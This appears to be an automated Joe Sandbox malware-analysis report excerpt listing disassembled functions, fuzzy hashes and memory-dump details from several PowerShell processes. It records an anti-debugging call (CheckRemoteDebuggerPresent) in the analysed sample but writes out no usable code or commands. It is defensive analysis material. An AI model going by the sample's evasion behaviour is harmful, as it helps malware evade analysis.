CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF887D16AA0

Memory Dump Source

Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 1abba9abb04bc6c9865a034acc7af7f01934c14cdc86d274030f8c26d90de500
Instruction ID: 1c03dffd535f264849a025da7001d53f71f693057df1f9b7264ff0cc7f831e87
Opcode Fuzzy Hash: 1abba9abb04bc6c9865a034acc7af7f01934c14cdc86d274030f8c26d90de500
Instruction Fuzzy Hash: 9231F23190861C8FCB58DF98C84A7ED7BE0FF65321F05426AD48AD7252DB74A846CB91

Function 00007FF887D11F93 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF887D16AA0

Memory Dump Source

Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 93a1328a105ddc487b7218be7d2496cdf8a93b5375629c3cdbf88989e9964fef
Instruction ID: 57b5bbcb9074f5db6d82ace146d2729395554e09f0762a4595f9620169456070
Opcode Fuzzy Hash: 93a1328a105ddc487b7218be7d2496cdf8a93b5375629c3cdbf88989e9964fef
Instruction Fuzzy Hash: 2C31C47190861C8FDB58DF98C44A7FDBBE0FF55311F14426AD48AD3242CB74A856CB91

Analysis Process: powershell.exePID: 8024, Parent PID: 7732COMMON

Executed Functions

Function 00007FF887E13C9C Relevance: 2.5, Strings: 1, Instructions: 1267COMMON

Download Yara Rule

Strings

(7 r, xrefs: 00007FF887E14527

Memory Dump Source

Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID: (7 r
API String ID: 0-1315544938
Opcode ID: 848a00c55eb16b25b5da8f8fd8550586cb2c1dedf0235bd48315687d6bef9bcb
Instruction ID: e17d02b20027a19f5426e91a6b97f785a303dbaf9bd99bfb0b1d018422b6ec13
Opcode Fuzzy Hash: 848a00c55eb16b25b5da8f8fd8550586cb2c1dedf0235bd48315687d6bef9bcb
Instruction Fuzzy Hash: 5A821322D4D78A8FE3A6862858561B83FF1FF57AA1B0901FBC04DC7593D91CAC46C362

Function 00007FF887E16605 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

X7 r, xrefs: 00007FF887E167FD

Memory Dump Source

Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID: X7 r
API String ID: 0-626409462
Opcode ID: 3bd327678016b9d9882ece08e9ab4d430ef4ae390970459bdc2995b67b092cd8
Instruction ID: b041677be37cc625724611568a94a23cfb6cbbba4029438fa750b91b54a19d7e
Opcode Fuzzy Hash: 3bd327678016b9d9882ece08e9ab4d430ef4ae390970459bdc2995b67b092cd8
Instruction Fuzzy Hash: 2FD14531D4DA8A8FE7A69B6858165BD7BF1FF067A1B0801FAD44DCB093DE1C9805C362

Function 00007FF887D4A0D3 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1503925908.00007FF887D49000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D49000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887d49000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b511cff8f92ee770b98dba7da3ee3cdc54d4c8111147587741f935f6435661d0
Instruction ID: d2c18e98e8e026de18c8104a8a25d96f8892a8ea22298eea73e38e3cb1651929
Opcode Fuzzy Hash: b511cff8f92ee770b98dba7da3ee3cdc54d4c8111147587741f935f6435661d0
Instruction Fuzzy Hash: D711517658E7C54FD793872488691983FB0FF63154B0D01EBD489CB0A7D6194809C792

Function 00007FF887D49738 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1503925908.00007FF887D49000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D49000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887d49000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87b90bd1888a07cc620c709567de50382f70628bea04fe13de3b80a8892be22
Instruction ID: 9aa2336df789c4a2590dcf633ec011036d0612657aabdd926d1cea9eb42116ec
Opcode Fuzzy Hash: d87b90bd1888a07cc620c709567de50382f70628bea04fe13de3b80a8892be22
Instruction Fuzzy Hash: 97412D31D1CA888FE75CAF5CA80A6BDBBE0FB55710F14426FE04993292DA64A815C7C2

Function 00007FF887C2E383 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1502914983.00007FF887C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887c2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8a66a5875189918cef00991cab2ddd5ea33322f24f3841cc5de77310f58824
Instruction ID: 1ac27e859c36554e15fc156d3d2f00e3461ff6f801ced6248e20a1c659fac513
Opcode Fuzzy Hash: fd8a66a5875189918cef00991cab2ddd5ea33322f24f3841cc5de77310f58824
Instruction Fuzzy Hash: 3B41007080DBC44FE756DB38D8499A63FB1EF52361B1506EFE08CCB1A3D625A806C792

Function 00007FF887D4A62C Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1503925908.00007FF887D49000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D49000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887d49000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc994c719262f5ded9f884423d6d04ad80d4892097f64cb36119d17645e6a3b
Instruction ID: 105f1a4c8712f02379d7a69a96d3f640978dbefa08d8ee51ec84b9b777abfa6b
Opcode Fuzzy Hash: 0dc994c719262f5ded9f884423d6d04ad80d4892097f64cb36119d17645e6a3b
Instruction Fuzzy Hash: 2821F33090CB8C4FDB59DBACD84A7E97FF0EB96320F04426BD049C7156DA74A45ACB92

Function 00007FF887E140BF Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce6459f53e6a007c9fbc153650b4c766d253d4a22abff17ff9c11f9c8cfdb19
Instruction ID: 6339983da0dd799c9fc604142b3de2e9177fe44f2520dc60ec3c20795f1a9785
Opcode Fuzzy Hash: 6ce6459f53e6a007c9fbc153650b4c766d253d4a22abff17ff9c11f9c8cfdb19
Instruction Fuzzy Hash: C821C532E4DA878FF3E5DB1C945217867E2FF56A92B6A01BAC00EC7692DE1CDC44C251

Function 00007FF887E143BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec89fe8dd66a9ef4cf3e9d721e3b301901d9c587ef7d17d1b8e7e238074f3e40
Instruction ID: fec7c0c18b9ca98ff984045013f728eedcea9c6c66292edeb64d6f0792399548
Opcode Fuzzy Hash: ec89fe8dd66a9ef4cf3e9d721e3b301901d9c587ef7d17d1b8e7e238074f3e40
Instruction Fuzzy Hash: D6110232D4D6858FE7E5E72894525BC77F1FF42AA275900BAC01DC7A97DA1DAC00C3A1

Function 00007FF887D433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1503925908.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 5b75784d4932cbf52903e89cf688f523059bf7730c4ababde96d3da05b2be3b7
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 2C01A73114CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42

Non-executed Functions

Function 00007FF887D4044D Relevance: 7.6, Strings: 6, Instructions: 103COMMON

Download Yara Rule

Strings

P/_, xrefs: 00007FF887D404A1
/_, xrefs: 00007FF887D40469
p0_, xrefs: 00007FF887D40491
(0_, xrefs: 00007FF887D404D1
8,_, xrefs: 00007FF887D404B1
-_, xrefs: 00007FF887D404F1

Memory Dump Source

Source File: 00000008.00000002.1503925908.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: (0_$8,_$P/_$p0_$-_$/_
API String ID: 0-2711177198
Opcode ID: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
Instruction ID: bd8335d587f6662f7f5c0b5c1a1a60cfb467673c65fc502ca9d33306254b1997
Opcode Fuzzy Hash: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
Instruction Fuzzy Hash: D231AA52D8E6C24FE39786B8AC2507C7FB1BF12690B5905FBC09D8B0DBD9089D48C362

Analysis Process: powershell.exePID: 8032, Parent PID: 7756COMMON

Executed Functions

Function 00007FF887E16660 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a22aa7649b595a7bc8c827840c5aed8d737ad4dc246a2f59b912c28708a1c5b7
Instruction ID: c468c38c14e0b96764d013d319dd3023f45754c8bac260b551b2647f41ebb76b
Opcode Fuzzy Hash: a22aa7649b595a7bc8c827840c5aed8d737ad4dc246a2f59b912c28708a1c5b7
Instruction Fuzzy Hash: 17C10431D4DA8A8FE7A69B6858165BD7BF1FF46B91B0401BED40DCB093DE1C9805C361

Function 00007FF887D49EF5 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc2e58f67854394bf6ca07632fd923b1744b6be0f4390b9eaf44dbea5234fe79
Instruction ID: 050c44e828c5abd4e0d14e41450e16b9608bf0af3cf3c600bdf850e1218d3e77
Opcode Fuzzy Hash: bc2e58f67854394bf6ca07632fd923b1744b6be0f4390b9eaf44dbea5234fe79
Instruction Fuzzy Hash: 3F71EA73D8CAC64FE342967CD85A0ED3BB0FF62298B0C01B7C5898B097EA155916C796

Function 00007FF887D4A808 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f736fbb7bfbfeee479b4e39eb1b139b8165474459d69d16f2e12fc951fdc577c
Instruction ID: 8614d7c5f742d7935dd1e154154122ef9a6f58d8942dcbc3ef036d854c9deddc
Opcode Fuzzy Hash: f736fbb7bfbfeee479b4e39eb1b139b8165474459d69d16f2e12fc951fdc577c
Instruction Fuzzy Hash: 5B612931A8CA854FE34ADB28CC954687BF0FF96354B1802BEC08ACB1D7EE15A807C755

Function 00007FF887E14073 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44e3234deaef30495aa51aad0e972e41556c091ba4b321c445a58a4516af7803
Instruction ID: c24520bdc0eaddb2d43101b46c9f7502a8cbf4c85fe4bb11e558aeea71ba9f96
Opcode Fuzzy Hash: 44e3234deaef30495aa51aad0e972e41556c091ba4b321c445a58a4516af7803
Instruction Fuzzy Hash: FE510832F4CA868FE7D9DA2C941267877E2FF56A51B2901BAC00EC7693DD18EC05C351

Function 00007FF887E14370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f570bfc50db885c4e0a810bdc23302b418ecf5b3e868a4b6204e9ac9f488c697
Instruction ID: 809227ff35fba70ccc8ef33594b71d915f494b447349e9cba117fabfde8ffebb
Opcode Fuzzy Hash: f570bfc50db885c4e0a810bdc23302b418ecf5b3e868a4b6204e9ac9f488c697
Instruction Fuzzy Hash: AF411932E4DA858FE7E5D66894126BC77F1FF46BA1B0801BAC05DC7683E91CAC11C391

Function 00007FF887D49738 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7061b478dd6d16766e2b8abb1ff96b60dc5be256f02d61c338bb4fef4ddbd2ca
Instruction ID: 9aa2336df789c4a2590dcf633ec011036d0612657aabdd926d1cea9eb42116ec
Opcode Fuzzy Hash: 7061b478dd6d16766e2b8abb1ff96b60dc5be256f02d61c338bb4fef4ddbd2ca
Instruction Fuzzy Hash: 97412D31D1CA888FE75CAF5CA80A6BDBBE0FB55710F14426FE04993292DA64A815C7C2

Function 00007FF887D49FE0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0721b76a3b23963b72c86a6a268c3f25ec673e32066a0f1ad54339157af933bc
Instruction ID: 2c13bcd06351cbcf3990d706f399af196cd0822e8183d7ae462baa97db9b878c
Opcode Fuzzy Hash: 0721b76a3b23963b72c86a6a268c3f25ec673e32066a0f1ad54339157af933bc
Instruction Fuzzy Hash: DA41CB63D8DAC24FF352963898191ED7FB0FF52784B1801BBD0899B0DBE9155805D786

Function 00007FF887C2E383 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1500230802.00007FF887C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887c2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9f5ac2aec558bf350c703070db1b9aa9c4fddcce51fc19977589babc4d6469
Instruction ID: f2ab4648065575f1e50a250176062e6217c7131569cb8b94984e33e92eaace8d
Opcode Fuzzy Hash: 9b9f5ac2aec558bf350c703070db1b9aa9c4fddcce51fc19977589babc4d6469
Instruction Fuzzy Hash: 7641E27180DBC44FE756CB38D8599623FB1EF52361B1506EFE08CCB1A3D625A846C792

Function 00007FF887D4A71C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aac9915347948bc8512190acf9493281f0a38834be82b1ead4e0ed2546ae780
Instruction ID: 412d82b7fbfafe904317511d8283ca7c06fb59cab9a0f59560f5029a3389fc18
Opcode Fuzzy Hash: 9aac9915347948bc8512190acf9493281f0a38834be82b1ead4e0ed2546ae780
Instruction Fuzzy Hash: 0B31F83194DB8C4FDB59DB6898496E97FF0FBA6320F0441AFC049C7153D6645816CB52

Function 00007FF887E140BF Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78dde0ac33839a19c4f253c1ad83119cd1359f18905ca37fa0daeb574a075b60
Instruction ID: 6339983da0dd799c9fc604142b3de2e9177fe44f2520dc60ec3c20795f1a9785
Opcode Fuzzy Hash: 78dde0ac33839a19c4f253c1ad83119cd1359f18905ca37fa0daeb574a075b60
Instruction Fuzzy Hash: C821C532E4DA878FF3E5DB1C945217867E2FF56A92B6A01BAC00EC7692DE1CDC44C251

Function 00007FF887E143BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c80a1b3883349ce1aa832d62ea971da197031a2da00d683fd5621912a7940b2
Instruction ID: fec7c0c18b9ca98ff984045013f728eedcea9c6c66292edeb64d6f0792399548
Opcode Fuzzy Hash: 0c80a1b3883349ce1aa832d62ea971da197031a2da00d683fd5621912a7940b2
Instruction Fuzzy Hash: D6110232D4D6858FE7E5E72894525BC77F1FF42AA275900BAC01DC7A97DA1DAC00C3A1

Function 00007FF887D433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 5b75784d4932cbf52903e89cf688f523059bf7730c4ababde96d3da05b2be3b7
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 2C01A73114CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42

Function 00007FF887D478CD Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ba449f96131b08f1a106abddddf57f266012c6e72958248a516b0458695910
Instruction ID: 5627f4086be4663e499d81e0ce649bf45fbe7c2dd84d75cb1271040c1b86a126
Opcode Fuzzy Hash: 22ba449f96131b08f1a106abddddf57f266012c6e72958248a516b0458695910
Instruction Fuzzy Hash: 40E0CD2028C6864FD345926CE0507FD7691AF85350F58157DF4DE87387C64D54419352

Non-executed Functions

Function 00007FF887D4044D Relevance: 7.6, Strings: 6, Instructions: 103COMMON

Download Yara Rule

Strings

(0_, xrefs: 00007FF887D404D1
P/_, xrefs: 00007FF887D404A1
/_, xrefs: 00007FF887D40469
p0_, xrefs: 00007FF887D40491
8,_, xrefs: 00007FF887D404B1
-_, xrefs: 00007FF887D404F1

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: (0_$8,_$P/_$p0_$-_$/_
API String ID: 0-2711177198
Opcode ID: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
Instruction ID: bd8335d587f6662f7f5c0b5c1a1a60cfb467673c65fc502ca9d33306254b1997
Opcode Fuzzy Hash: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
Instruction Fuzzy Hash: D231AA52D8E6C24FE39786B8AC2507C7FB1BF12690B5905FBC09D8B0DBD9089D48C362

Function 00007FF887D40675 Relevance: 5.2, Strings: 4, Instructions: 227COMMON

Download Yara Rule

Strings

PM, xrefs: 00007FF887D40831
p@s, xrefs: 00007FF887D406E1
d6, xrefs: 00007FF887D406C1
x._, xrefs: 00007FF887D40741

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: d6$PM$p@s$x._
API String ID: 0-4004481620
Opcode ID: a3707fdd54644e70b22dedf76f19dfe51e8b848f6e412cbae961f0affed33418
Instruction ID: 0394e7ffa2f2c9d5f634a468baa4fec715361bc0963005daa5aa15e5a5fa893e
Opcode Fuzzy Hash: a3707fdd54644e70b22dedf76f19dfe51e8b848f6e412cbae961f0affed33418
Instruction Fuzzy Hash: 9C81F452D8E6C25FE3969774982917C7FB0BF6369071801FFC0EA8B1DBD9099819C382

Function 00007FF887D48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^4, xrefs: 00007FF887D48BFA
L_^J, xrefs: 00007FF887D48C8A
L_^7, xrefs: 00007FF887D48C12
L_^F, xrefs: 00007FF887D48C7A

Memory Dump Source

Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
Instruction ID: bf73de9190a631f0e5857521b6b1f9c4c648db80c959f5714543f87d2402c667
Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
Instruction Fuzzy Hash: C62126B7A081294ED3017BFDF8046ED3740DF952B434552B2D2AD8B003EA187087CAE1

Analysis Process: powershell.exePID: 7572, Parent PID: 7756COMMON

Executed Functions

Function 00007FF887E26660 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f757ca3bb2903d7a354ffbfde25b4b67cac25a5eb53df01b8235f8e813e0617
Instruction ID: 63849f5ba320546fe74ff89661c72c5c457a6f708e799aaf0a7c5c2eb826088e
Opcode Fuzzy Hash: 4f757ca3bb2903d7a354ffbfde25b4b67cac25a5eb53df01b8235f8e813e0617
Instruction Fuzzy Hash: FEC12221D6DA8A8FE7A9AB6858155BD7BE1FF46B91F1402BEE40DCB483DD1CA801C341

Function 00007FF887D5B418 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae8b6d299c89308e15f93a52eba67f8ab29c82f522d0f02e3f65dba801bc19d
Instruction ID: d40789345ae55164f8179d75b92a4cd0d510440d967167bdb309e9d49b41de84
Opcode Fuzzy Hash: 2ae8b6d299c89308e15f93a52eba67f8ab29c82f522d0f02e3f65dba801bc19d
Instruction Fuzzy Hash: BCB11570A1CB884FE749EF18C885AB9BBE1FF95351F10027ED48AC7196DA35E846CB41

Function 00007FF887D5A146 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353ecd3ebb6f17c8b956ec7613845bd17dfd3c38c135a6010b97a40908f9ec99
Instruction ID: a07826a4b88b2bf34189557a648cd1716ed49afa8cb44da0b148f65f7585a855
Opcode Fuzzy Hash: 353ecd3ebb6f17c8b956ec7613845bd17dfd3c38c135a6010b97a40908f9ec99
Instruction Fuzzy Hash: 04F0A031849A8DCFCB86DF2888594E87FF0FF65241B0502ABE409C7061EB659948CBC2

Function 00007FF887D59750 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73c10b54df67a10fec0cf83f92fc11fbbee1b54a3a355081e1c250f3e1be0339
Instruction ID: 05e8de4fb0fbee2e23474fa36072c7c91a049fe891e08a5790aec2b947ca0dda
Opcode Fuzzy Hash: 73c10b54df67a10fec0cf83f92fc11fbbee1b54a3a355081e1c250f3e1be0339
Instruction Fuzzy Hash: 7741097190CB888FE758DF1C9C0A6B97BF0FB65310F04416FE04993252DA74A85ACBC2

Function 00007FF887C3E8E3 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1831471766.00007FF887C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887c3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f668572ef6f8102e66d313a016e4299d931a924dd1f28777d053983fa50524
Instruction ID: 52e84aa8402dabbb4deeed551ad9b74b0041819f62042335e7efd35985f58e21
Opcode Fuzzy Hash: 92f668572ef6f8102e66d313a016e4299d931a924dd1f28777d053983fa50524
Instruction Fuzzy Hash: F441137180DBC44FE7579B38D8559623FF0EF56360B1905EFE088CB1A3D625A84AC7A2

Function 00007FF887D533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 1a6daca573c69e7de735de054f62f81451822c0c8c25e81550fb5a368bff336d
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 1C01A73110CB0C4FD744EF0CE051AA9B3E0FB85364F10052DE58AC3661DA36E882CB42

Function 00007FF887E2414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

